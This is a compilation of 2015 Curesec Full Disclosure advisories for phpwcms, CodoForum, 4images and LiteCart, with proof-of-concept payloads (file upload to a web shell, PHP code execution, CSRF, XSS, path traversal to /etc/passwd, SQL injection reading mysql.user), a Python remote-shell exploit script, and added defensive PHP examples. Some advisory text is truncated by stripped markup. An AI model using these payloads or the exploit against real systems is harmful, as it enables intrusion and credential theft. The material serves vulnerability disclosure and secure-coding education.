10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-XSS-121.html
[FD] phpwcms 1.7.9: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: phpwcms 1.7.9
Fixed in: 1.8.0 RC1
Fixed Version Link: https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Vendor Website: http://www.phpwcms.de/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

phpwcms allows the upload of files with dangerous type, which leads to code execution. Additionally, it allows registered users who are not admins to use PHP tags, which also leads to code execution. Please note that a user account is needed to upload files. The user does not need administration rights, but there is no open registration by default (the form to add users is however open to CSRF).

3. Unrestricted Upload of File with Dangerous Type

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
When uploading files, there are no checks as to the type or extension of the file.

When uploading single files, these are stored inside the "filearchive" directory. The original file name is changed to the hash of the file name. The directory is protected with a .htaccess file from accessing or executing files directly. Because of this, uploading single files can not easily be exploited; it may however be possible to execute them via include_int_php (see below).

However, when uploading multiple files, these are stored temporarily inside the "upload" directory, and these files are not renamed. The "upload" directory is also protected by an .htaccess file, but as .htaccess files can be uploaded, it can be overwritten, thus leading to code execution.

Please note that a user account is needed to upload files. The user does not need administration rights, but there is no open registration by default.

Proof of Concept

Upload a .htaccess file and a PHP file here:
http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=files&p=8

The .htaccess file should contain:
allow from all

Now the uploaded PHP file can be accessed and executed:
http://localhost/phpwcms-phpwcms-1.7.9/upload/shell.php?x=id

4. Code Execution

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
The functions include_int_php, include_int_phpcode, and include_ext_php can all be used to gain code execution. These functions can be used by any logged in user, admin rights are not required.

Proof of Concept

Create a new article. As author, use:
[PHP] passthru("touch mynewtest.php") [/PHP]

Visiting http://localhost/phpwcms-phpwcms-1.7.9/feeds.php is one of the ways to trigger the code execution. Please note that the feed is by default cached for one hour, during which the code would not be executed as the cache is loaded instead. The vulnerable functions are used in other places as well, which means an attacker may not have to wait an hour for the cache to clear by triggering the code elsewhere.

5. Solution

To mitigate this issue please upgrade at least to version 1.8.0 RC1:
https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor confirmed issues
10/21/2015 Reminded Vendor of Disclosure Date
10/25/2015 Vendor requests more time
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of Disclosure Date
11/29/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/phpwcms-179-Code-Execution-122.html
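Three of the advisories in this batch turn on upload validation: redaxscript trusts exif_imagetype() alone (so a GIF signature in front of PHP code passes), Geeklog checks the type only client-side, and phpwcms accepts any file including a replacement .htaccess. The following is an added example, not code from any of those projects, of a server-side check that all three bypasses fail. The type comes from the magic bytes, the extension from the client-supplied name, and the two must agree; dot-files are refused; the stored name is random. Function names are the example's own, and it assumes the destination directory is one the web server never executes scripts from.

```php
<?php
// Added example, not redaxscript, Geeklog or phpwcms code: server-side upload
// validation. The file type is taken from the magic bytes, the extension from
// the client name, and the two must agree; the stored name is random; server
// configuration files such as .htaccess are never accepted.

declare(strict_types=1);

// Allowed image types, keyed by the IMAGETYPE_* constant PHP detects.
const ALLOWED_IMAGE_TYPES = [
    IMAGETYPE_GIF  => ['gif'],
    IMAGETYPE_JPEG => ['jpg', 'jpeg'],
    IMAGETYPE_PNG  => ['png'],
];

/** Magic-byte detection: exif_imagetype() if the exif extension is loaded, else getimagesize(). */
function detect_image_type(string $path): ?int
{
    if (function_exists('exif_imagetype')) {
        $type = @exif_imagetype($path);
        return $type === false ? null : $type;
    }
    $info = @getimagesize($path);
    return $info === false ? null : $info[2];
}

/**
 * Returns the extension to store the file under, or null to reject.
 * $tmpPath is the uploaded temp file, $clientName the browser-supplied name.
 */
function validate_image_upload(string $tmpPath, string $clientName): ?string
{
    $base = basename(str_replace("\\", '/', $clientName));
    // Dot-files (.htaccess, .user.ini) and names without an extension: reject.
    if ($base === '' || $base[0] === '.' || strpos($base, '.') === false) {
        return null;
    }
    $type = detect_image_type($tmpPath);
    if ($type === null || !isset(ALLOWED_IMAGE_TYPES[$type])) {
        return null; // no valid image signature, or a type we do not serve
    }
    // Judge by the LAST extension, so "x.gif.php" is "php" and "index.php" is "php".
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_IMAGE_TYPES[$type], true)) {
        return null; // signature says image but the name says php: the bypass
    }
    return $ext;
}

/** Stores a validated upload under a random name inside $destDir. */
function store_upload(string $tmpPath, string $clientName, string $destDir): ?string
{
    $ext = validate_image_upload($tmpPath, $clientName);
    if ($ext === null) {
        return null;
    }
    $target = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // For a real $_FILES upload use move_uploaded_file(); rename() keeps the demo offline.
    return rename($tmpPath, $target) ? $target : null;
}

// --- Demo with constructed files -----------------------------------------
$dir = sys_get_temp_dir() . '/upload_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
// A complete 1x1 transparent GIF.
file_put_contents("$dir/a.tmp", base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
// The redaxscript bypass: a GIF signature in front of PHP code.
file_put_contents("$dir/b.tmp", "GIF89a\n<?php echo 'constructed'; ?>");
// The phpwcms bypass: a replacement server configuration file.
file_put_contents("$dir/c.tmp", "allow from all\n");

var_dump(store_upload("$dir/a.tmp", 'photo.GIF', $dir)); // real image, matching extension
var_dump(store_upload("$dir/b.tmp", 'index.php', $dir)); // GIF signature, php name
var_dump(store_upload("$dir/c.tmp", '.htaccess', $dir)); // dot-file
```

Only the first call returns a path: the second fails because the signature-derived type (GIF) allows no "php" extension, and the third never reaches the signature check because dot-files are refused up front. Note what the check does not do: a polyglot named photo.gif with PHP after the header is still accepted as a GIF, which is why the random name and a non-executing destination directory remain part of the design rather than optional extras.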
[FD] phpwcms 1.7.9: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: phpwcms 1.7.9
Fixed in: 1.8.0 RC1
Fixed Version Link: https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Vendor Website: http://www.phpwcms.de/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description
There is no CSRF protection for any forms, which means that an attacker can perform any action a victim can perform, if the victim visits an attacker controlled website while logged in. In the case of phpwcms, an attacker can add an admin user and thus gain code execution.

3. Proof of Concept

Add Admin User:
http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=admin&s=1"; method="POST">

4. Solution

To mitigate this issue please upgrade at least to version 1.8.0 RC1:
https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor confirmed issues
10/21/2015 Reminded Vendor of Disclosure Date
10/25/2015 Vendor requests more time
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of Disclosure Date
11/29/2015 Vendor releases fix
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/phpwcms-179-CSRF-123.html
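The missing control here is a per-session anti-CSRF token. The following is an added example, not phpwcms code, of the pattern: a random token bound to the session, emitted as a hidden field in every state-changing form, and compared in constant time before the action runs. A form submitted from another origin cannot include the token, so the "add admin user" request in the PoC is refused. Function and field names are the example's own; plain arrays stand in for $_SESSION and $_POST so the script runs offline.

```php
<?php
// Added example, not phpwcms code: per-session CSRF tokens for state-changing
// forms. Every POST handler calls verify_csrf() before doing anything; a
// request forged from another origin cannot know the token.

declare(strict_types=1);

/** Returns the session's token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every form that changes state. */
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

/** Constant-time comparison; false for a missing, non-string or wrong token. */
function verify_csrf(array $session, array $post): bool
{
    if (empty($session['csrf_token']) || !isset($post['csrf_token'])
        || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

/** The "add user" action guarded by the check (user creation itself is stubbed). */
function handle_add_user(array $session, array $post): string
{
    if (!verify_csrf($session, $post)) {
        return 'rejected: missing or invalid CSRF token';
    }
    // ... real user creation would happen here ...
    return 'user ' . ($post['username'] ?? '?') . ' created';
}

// --- Demo with constructed session/post arrays ---------------------------
$session = [];                 // stands in for $_SESSION
$hidden = csrf_field($session); // rendering the form binds a token to this session

// Forged request: an attacker's page cannot read the victim's token.
echo handle_add_user($session, ['username' => 'evil', 'password' => 'x']), "\n";

// Legitimate request: the token came back from our own form.
echo handle_add_user($session, ['username' => 'alice', 'csrf_token' => $session['csrf_token']]), "\n";

// Wrong token (e.g. guessed or from another session): also refused.
echo handle_add_user($session, ['username' => 'mallory', 'csrf_token' => str_repeat('0', 64)]), "\n";
```

The first and third calls are rejected, only the second creates a user. hash_equals() matters because a byte-by-byte string comparison that stops at the first mismatch leaks timing information about the token; the token must also be regenerated on login so a pre-login value cannot be fixed by an attacker.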
[FD] CodoForum 3.4: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: CodoForum 3.4
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: ad...@codologic.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 12/02/2015
Release mode: Full Disclosure
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability in CodoForum 3.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers.

The HybridAuth 2.1.2 Install script is vulnerable to XSS attacks. In version 3.4, CodoForum did update HybridAuth to the latest version, but kept the old version in a folder called hybridauthold.

3. Proof of Concept

http://localhost/codoforum/sys/Ext/hybridauthold/install.php/";>alert(1)

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/23/2015 Vendor requests clarification
09/23/2015 Clarified Issue
09/29/2015 Reminded Vendor of disclosure date
09/29/2015 Vendor requests more time
09/29/2015 Set new disclosure date
11/03/2015 Reminded Vendor of disclosure date (no reply)
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/CodoForum-34-XSS-62.html
[FD] 4images 1.7.11: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: 4images 1.7.11
Fixed in: 1.7.12
Fixed Version Link: http://www.4homepages.de/download-4images
Vendor Website: http://www.4homepages.de/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/04/2015
Release mode: Coordinated release
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description
4images comes with a HTML Template editor which allows the editing of HTML files. But it will also create a new file if the passed file name does not already exist. When doing this, it does not check that the extension of the passed file is .html. Admin credentials are required to use the HTML template editor.

3. Proof of Concept

POST /4images/admin/templates.php HTTP/1.1

__csrf=28a9a05b480c3f8ed326523b1ce7532c&action=savetemplate&content=%s", $lang['template_edit_error']);
        }
    }
    $action = "modifytemplates";
}

5. Solution

To mitigate this issue please upgrade at least to version 1.7.12:
http://www.4homepages.de/download-4images
Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-105.html
[FD] 4images 1.7.11: Code Execution Exploit
#!/usr/local/bin/python
# Exploit for 4images 1.7.11 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"
shellFileName = "404.php"
shellContent = ""

def login(requestSession, url, username, password):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)
    postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
    loginResult = requestSession.post(url, data = postData).text
    return "loginpassword" not in loginResult

def upload(requestSession, url, fileName, fileContent):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)
    postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
    loginResult = requestSession.post(url, data = postData).text

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")

requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: Incorrect username or password")

upload(requestSession, url + fileManagerPath, shellFileName, shellContent)
runShell(url + "/templates/default/" + shellFileName + "?x=")

Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-Exploit-117.html
[FD] 4images 1.7.11: Path Traversal
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: 4images 1.7.11
Fixed in: 1.7.12
Fixed Version Link: http://www.4homepages.de/download-4images
Vendor Website: http://www.4homepages.de/
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS
Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description
When downloading or displaying a backup file, the file parameter is vulnerable to directory traversal. This is the case because the get_basefile function contains a bug. When the passed path name ends with a slash, it will return the entire path instead of the file name. By adding ?/ to the file name, an attacker can thus download or display arbitrary files. Admin credentials are required to view or download backup files.

3. Proof of Concept

GET /4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/ HTTP/1.1

GET /4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/ HTTP/1.1

4. Code

/admin/backup.php

if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) {
    $file = (isset($HTTP_GET_VARS['file'])) ? get_basefile(trim($HTTP_GET_VARS['file'])) : get_basefile(trim($HTTP_POST_VARS['file']));
} else {
    $file = "";
}

if ($action == "downloadbackup") {
    $size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file);
    header("Content-type: application/x-unknown");
    header("Content-length: $size\n");
    header("Content-Disposition: attachment; filename=$file\n");
    readfile(ROOT_PATH.DATABASE_DIR."/".$file);
    exit;
}

/includes/functions.php

function get_basename($path) {
    $path = str_replace("\\", "/", $path);
    $name = substr(strrchr($path, "/"), 1);
    return $name ? $name : $path;
}

function get_basefile($path) {
    $basename = get_basename($path);
    preg_match("#(.+)\?(.+)#", $basename, $regs);
    return isset($regs[1]) ? $regs[1] : $basename;
}

5. Solution

To mitigate this issue please upgrade at least to version 1.7.12:
http://www.4homepages.de/download-4images
Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Path-Traversal-106.html
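The bug is an ordering problem: get_basename() runs before the "?" suffix is cut off, so a trailing "?/" leaves an empty basename, the whole input is returned, and the later regex merely strips the "?/" again. The following is an added example, not 4images code, that reproduces the vulnerable logic next to a safe version: strip the query-like suffix first, then basename(), then refuse anything that is not a plain file name, and finally confirm with realpath() that the resolved file lies inside the backup directory. Function names are the example's own; the demo creates a temporary directory with one constructed backup file.

```php
<?php
// Added example, not 4images code: the advisory's get_basefile() returns the
// whole path when the input ends in "/". safe_basefile() strips any "?..."
// suffix first, then takes basename(), then refuses anything that is not a
// plain file name; resolve_backup_file() additionally checks containment.

declare(strict_types=1);

/** Vulnerable logic, reproduced from the advisory for comparison only. */
function vulnerable_get_basefile(string $path): string
{
    $path = str_replace("\\", "/", $path);
    $name = substr(strrchr($path, "/") ?: '', 1);
    $basename = $name !== '' ? $name : $path;
    preg_match("#(.+)\?(.+)#", $basename, $regs);
    return isset($regs[1]) ? $regs[1] : $basename;
}

/** Returns a safe file name, or null if the input must be rejected. */
function safe_basefile(string $path): ?string
{
    $path = str_replace("\\", "/", $path);
    // Drop a query-string-like suffix BEFORE taking the base name, so a
    // trailing "?/" cannot turn the whole traversal string into the result.
    $path = explode('?', $path, 2)[0];
    $name = basename($path);
    // Only plain names: letters, digits, '.', '_', '-', and never "." or "..".
    if ($name === '' || $name === '.' || $name === '..'
        || !preg_match('/\A[A-Za-z0-9._-]+\z/', $name)) {
        return null;
    }
    return $name;
}

/** Full path of a backup file that is guaranteed to lie inside $backupDir, or null. */
function resolve_backup_file(string $backupDir, string $userInput): ?string
{
    $name = safe_basefile($userInput);
    $dir  = realpath($backupDir);
    if ($name === null || $dir === false) {
        return null;
    }
    // realpath() fails for missing files and resolves symlinks; require the
    // result to sit directly under the backup directory.
    $full = realpath($dir . '/' . $name);
    if ($full === false || strpos($full, $dir . '/') !== 0) {
        return null;
    }
    return $full;
}

// --- Demo with constructed inputs ---------------------------------------
$poc = '../../../../../../etc/passwd?/';   // the advisory's payload

var_dump(vulnerable_get_basefile($poc));    // whole traversal path survives
var_dump(safe_basefile($poc));              // reduced to the bare name "passwd"
var_dump(safe_basefile('backup?/'));        // legitimate name with a stray suffix

$dir = sys_get_temp_dir() . '/backup_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/db.sql", "-- constructed backup\n");

var_dump(resolve_backup_file($dir, 'db.sql'));  // resolves inside $dir
var_dump(resolve_backup_file($dir, $poc));      // no "passwd" inside $dir: null
```

Two layers are deliberate. safe_basefile() alone already prevents traversal (the name can contain no slash), but realpath() containment also covers symlinked entries and mistakes in later refactoring, at the cost of only accepting files that already exist, which is exactly right for a download handler.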
[FD] 4images 1.7.11: SQL Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: 4images 1.7.11
Fixed in: 1.7.12
Fixed Version Link: http://www.4homepages.de/download-4images
Vendor Website: http://www.4homepages.de/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description
When backing up the database, the user can supply the tables that should be backed up. The program does not check if these tables actually belong to the 4images database or to a different database. Because of this, it is possible to back up, and thus read, any database the database user has access to.

However, even if there were a check for the database, it would still be possible to perform arbitrary SELECT statements by injecting into a SELECT query that looks like this: "SELECT * FROM $table" where $table is user supplied.

Admin credentials are required to back up the database.

3. Proof of Concept

POST /4images/admin/backup.php HTTP/1.1

__csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=mysql.user

POST /4images/admin/backup.php HTTP/1.1

__csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=4images_comments where comment_id=-1 union all select user,password,3,4,5,6,7,8 from mysql.user

4. Solution

To mitigate this issue please upgrade at least to version 1.7.12:
http://www.4homepages.de/download-4images
Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-SQL-Injection-108.html
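A table name is an identifier, not a value, so it cannot be bound as a prepared-statement parameter; the fix is an allowlist. The following is an added example, not 4images code, that accepts a requested table only if it matches the application's table prefix and is present in the live table list, and then backtick-quotes the identifier. The PDO handle is an in-memory SQLite database constructed for the demo (the real application would run SHOW TABLES on its MySQL connection); function names and the schema are the example's own.

```php
<?php
// Added example, not 4images code: the backup feature should only dump tables
// the application itself owns. Validate each requested name against the set of
// tables actually present and against the table prefix, then quote the
// identifier. The database here is an in-memory SQLite constructed for the demo.

declare(strict_types=1);

/** Returns only those requested names that are real tables carrying our prefix. */
function allowed_backup_tables(array $requested, array $existing, string $prefix): array
{
    $ok = [];
    foreach ($requested as $t) {
        if (!is_string($t)) {
            continue;
        }
        // Identifier allowlist: no spaces, dots, quotes or comment markers can pass.
        if (!preg_match('/\A' . preg_quote($prefix, '/') . '[A-Za-z0-9_]+\z/', $t)) {
            continue;
        }
        // Exact match against the live table list, never a user-built string.
        if (in_array($t, $existing, true)) {
            $ok[] = $t;
        }
    }
    return $ok;
}

/** Builds the dump query for one already-validated table; the identifier is backtick-quoted. */
function backup_query(string $table): string
{
    return 'SELECT * FROM `' . str_replace('`', '``', $table) . '`';
}

// --- Demo with a constructed SQLite schema ------------------------------
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE "4images_comments"(comment_id INTEGER, user_id INTEGER)');
$pdo->exec('CREATE TABLE "4images_users"(user_id INTEGER, user_name TEXT)');
$pdo->exec('CREATE TABLE "other_secret"(s TEXT)');
$pdo->exec('INSERT INTO "4images_users" VALUES (1, \'alice\'), (2, \'bob\')');

// Live table list (MySQL would use SHOW TABLES).
$existing = $pdo->query("SELECT name FROM sqlite_master WHERE type='table'")
               ->fetchAll(PDO::FETCH_COLUMN);

// The two payloads from the advisory plus one legitimate request.
$requested = [
    'mysql.user',
    '4images_comments where comment_id=-1 union all select user,password,3,4,5,6,7,8 from mysql.user',
    'other_secret',
    '4images_users',
];

$tables = allowed_backup_tables($requested, $existing, '4images_');
var_dump($tables); // only the legitimate, prefixed, existing table survives
foreach ($tables as $t) {
    $rows = $pdo->query(backup_query($t))->fetchAll(PDO::FETCH_ASSOC);
    printf("%s: %d rows\n", $t, count($rows));
}
```

Of the four requests only 4images_users is dumped: the dotted name and the injected WHERE/UNION fail the identifier regex, and other_secret, though it exists, lacks the prefix. The prefix check is what answers the advisory's first point (reading foreign databases); the regex plus exact-match is what answers the second (injecting into "SELECT * FROM $table").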
[FD] 4images 1.7.12: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: 4images 1.7.12
Fixed in: 1.7.13 (update)
Fixed Version Link: http://www.4homepages.de/download-4images
Vendor Website: http://www.4homepages.de/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: Requested, but not assigned
Credits: Tim Coen of Curesec GmbH

2. Overview

There are two reflected XSS vulnerabilities in 4images, as well as a persistent Open Redirect, which may also lead to XSS in older browsers. This allows an attacker to execute arbitrary JavaScript in the context of the browser of a victim if the victim clicks on an attacker supplied link or visits an attacker controlled website. With this, it is possible to bypass CSRF protection and thus do anything the victim can do, inject a JavaScript keylogger, or perform phishing attacks.

It should be noted that the XSS vulnerability still existed in another form in the first release of version 1.7.13 and has been fixed with an update to that version.

3. Reflected XSS 1

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
When displaying the form to add new images, $_SERVER['PHP_SELF'] is echoed unencoded inside a select tag. Because of this, additional attributes can be added and new HTML tags can be created, leading to XSS.

Proof of Concept

Prior to Version 1.7.12:
http://localhost/4images/admin/images.php/"; onfocus=alert(1) autofocus foo="?action=addimages

Version 1.7.13 (before update):
http://localhost/4images/admin/images.php/');alert(1);window.location=('?action=addimages

This required a click of the victim to trigger, and a redirect will be performed after the execution of the injected code.

Code

/admin/images.php

show_num_select_row(" ", "num_newimages", $lang['num_addnewimages_desc']);

/admin/admin_functions.php

function show_num_select_row($title, $option, $desc = "") {
    global $site_sess, $PHP_SELF, $action, $$option;
    echo "\n".$title."\n";
    echo "".$desc;
    $url = $PHP_SELF;
    $url .= preg_match("/\?/", $url) ? "&" : "?";
    $url .= "action=".$action;
    $url = $site_sess->url($url);
    echo "url($goto);
} else {
    $framesrc = $site_sess->url("home.php");
}
?>

Control Panel
" name="head" scrolling="NO" NORESIZE frameborder="0" marginwidth="0" marginheight="0" border="no">
" name="nav" scrolling="auto" NORESIZE frameborder="0" marginwidth="0" marginheight="0" border="no">

5. Persistent Open Redirect

CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description
When showing an uploaded image, the description and keyword are not properly encoded. Tags are removed, but it is still possible to add further attributes to the meta tag they are inserted into. This makes it possible to inject a redirect. This redirect will be persistent, meaning anyone visiting the site of the uploaded image will be redirected to an attacker controlled website.

The attacker needs the rights to upload images to perform the attack, which means that a category needs to exist where anyone can upload images, or a category needs to exist where registered users can upload images and the registration must be open - which it is by default.

Proof of Concept

Upload an image, as description or keyword use:

Version 1.7.11 and earlier:
5;URL=http://google.com/"; http-equiv="refresh" foo="

Version 1.7.12:
5;URL=http://google.com/"; http-equiv=refresh foo="

When visiting the page of the uploaded image, a redirect will be performed. With older browsers, it will be possible to inject and execute javascript as well.

Code

details.php

$meta_keywords = !empty($image_row['image_keywords']) ? strip_tags(implode(", ", explode(",", $image_row['image_keywords']))) : "";
$meta_description = !empty($image_row['image_description']) ? strip_tags($image_row['image_description']) . ". " : "";
$site_template->register_vars(array(
    "detail_meta_description" => $meta_description,
    "detail_meta_keywords" => $meta_keywords,
    "prepend_head_title" => $image_name . " - ",
));

6. Solution

To mitigate this issue please upgrade at least to version 1.7.13:
http://www.4homepages.de/download-4images
Please note that a newer version might already be available.

7. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases new version (1.7.12), partially fixing issues
11/17/2015 CVE Requested (no reply)
11/18/2015 Vendor releases new ve
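The details.php fragment shows why strip_tags() is the wrong tool for the meta tag: it removes angle brackets but leaves the double quote that closes the content attribute, so new attributes such as http-equiv="refresh" can be appended. The following is an added example, not 4images code, that places the vulnerable construction next to an attribute-safe one using htmlspecialchars() with ENT_QUOTES. The payload mirrors the advisory's shape but points at a reserved example host rather than a real site; function names are the example's own.

```php
<?php
// Added example, not 4images code: strip_tags() is the wrong tool for data
// that ends up inside an attribute value. Encoding with htmlspecialchars() and
// ENT_QUOTES turns the '"' the payload needs to close the attribute into
// '&quot;', so no new attribute (http-equiv="refresh") can be injected.

declare(strict_types=1);

/** The advisory's approach: tags are removed, quotes survive intact. */
function meta_keywords_vulnerable(string $keywords): string
{
    $value = strip_tags(implode(', ', explode(',', $keywords)));
    return '<meta name="keywords" content="' . $value . '">';
}

/** Attribute-safe output: quotes, ampersands and angle brackets are encoded. */
function meta_keywords_safe(string $keywords): string
{
    $parts = array_map('trim', explode(',', $keywords));
    $value = htmlspecialchars(implode(', ', $parts), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<meta name="keywords" content="' . $value . '">';
}

/** True if the rendered tag carries any attribute other than name and content. */
function has_injected_attribute(string $tag): bool
{
    preg_match_all('/\s([a-zA-Z-]+)=/', $tag, $m);
    return array_diff(array_unique($m[1]), ['name', 'content']) !== [];
}

// Payload shape from the advisory, with a constructed destination host.
$payload = '5;URL=http://attacker.invalid/" http-equiv="refresh" foo="';

$vuln = meta_keywords_vulnerable($payload);
$safe = meta_keywords_safe($payload);

echo $vuln, "\n";
echo $safe, "\n";
var_dump(has_injected_attribute($vuln)); // the refresh attribute was injected
var_dump(has_injected_attribute($safe)); // the whole payload stayed inside content
```

The vulnerable rendering contains a genuine http-equiv attribute, so the browser treats the tag as a refresh directive; the safe rendering keeps the entire payload inside the content value as text. The same encoding step applies to the PHP_SELF echo in show_num_select_row(), which is an attribute context too.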
Re: [FD] LiteCart 1.3.2: Multiple XSS
Hi,

These vulnerabilities are similar, as both of them are issues with the query parameter of the search. However, the issue in version 1.1.2.1 exploits this line:

This issue was fixed in version 1.2 by passing the query parameter to htmlspecialchars before passing it to sprintf.

The issue in version 1.3.2 is that the query parameter is also echoed unencoded inside the title tag, which is why the POC contains .

Best
Curesec Research Team

On 11/18/2015 at 6:50 PM, Henri Salo wrote:
> On Fri, Nov 13, 2015 at 05:07:01PM +0100, Curesec Research Team (CRT) wrote:
>> 2. XSS 1
>> http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=";>alert(1)
>> 5. Solution
